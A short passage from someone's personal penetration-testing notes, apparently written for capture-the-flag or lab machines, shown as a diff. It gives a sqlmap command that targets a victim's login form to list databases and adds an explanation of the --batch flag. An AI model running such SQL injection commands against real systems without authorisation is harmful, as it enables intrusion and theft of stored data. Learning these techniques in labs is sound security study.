shatha893/Notes/Machines/Helpful_Shit/helpful_shit.md

   ```console
   sqlmap -u [LINK OF VICTIM] --data='username=&password=' --method POST --dbs --batch
   ```
 * In addition to the databases' names the previous line also provided me with the version of the SQL on the server.
+* `--batch` answers the questions for me with the default.
 <br/>
 * We can also get the tables' names by writing the following line:
   ```console